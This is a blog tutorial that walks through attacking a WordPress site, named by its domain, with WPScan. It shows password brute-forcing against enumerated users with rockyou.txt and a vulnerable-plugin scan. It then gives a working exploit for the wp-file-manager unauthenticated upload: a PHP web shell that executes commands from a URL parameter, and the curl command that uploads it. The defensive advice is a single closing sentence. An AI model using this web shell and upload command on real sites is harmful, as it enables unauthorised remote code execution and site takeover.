WordPress powers over 40% of the web, making it a prime target for hackers. If you’re serious about security, you need tools that can proactively identify weaknesses before attackers exploit them. That’s where WPScan comes in—a powerful, open-source security scanner designed specifically for WordPress. Whether you’re a developer, site owner, or security enthusiast, WPScan helps uncover vulnerabilities in plugins, themes, and core files, ensuring your site stays protected. In this post, we’ll explore what WPScan is, how it works, and why it’s an essential tool for safeguarding your WordPress site.
In this blog, we are going to pentest a wordpress site belonging to one of our clients. You can find the site here.
To use WPScan, you can either start a VM with Kali Linux running or you can download it for Mac/Windows here. You will also need to sign up (it’s free) and obtain an api key from there. Once you have WPScan on your system and youur api key you can begin penetration testing.
Let’s start the test by enumerating the users on the wordpress website and checking for any weak passwords. You can download this text file called rockyou.txt, which is a list of commonly used passwords across the internet.
Open up your terminal in the same directory as the rockyou.txt file and type
wpscan --url https://locsexotica.com --passwords rockyou.txt
It will run for a few seconds, bruteforcing each password inside rockyou.txt against each user detected by WPScan until it finds a match.
In our case, after a few seconds, we see that it found a match with the username obvioususer and password123 (very weak password). If we go to the login page of our site, we see that we can indeed login with these credentials and gain Contributor level access.
Next lets try searching for any vulnerable plugins on the site. To do this, grab your api key from WPScan and enter the following in your terminal
wpscan --url https://locsexotica.com -e vp --api-token <YOUR-API-TOKEN>
-e means enumerate and vp stands for vulnerable plugins. Run this command and wait a few seconds.
After a few minutes, we see a bunch of vulnerabilities found with links on how to exploit them. Most interesting is Unauthenticated Arbitrary File Upload leading to RCE. You read more about the exploit here. It basically means that we can submit a file via post request to https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php and the file would actually be uploaded to the website! This can lead to remote code execution and potentially a hacker can take over your entire site. Let’s try it in our case. To do this let’s create a php file called shell.php
<?php
echo "Hacked by WPScan!";
// Execute system commands
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>Now, lets use curl to submit the post request with the required fields
curl -i -X POST "https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" -F "cmd=upload" -F "target=l1_Lw" -F "upload[]=@shell.php"
After running the above, we see the following being output into the terminal
This response means we have successfully uploaded a file to the wordpress website while being unauthenticated. Now if we go to https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/files/shell.php we see
Thus our hack is successful. To prevent these types of hacks from happening, we should regularly update our plugins. Join our newsletter for a free Website security audit!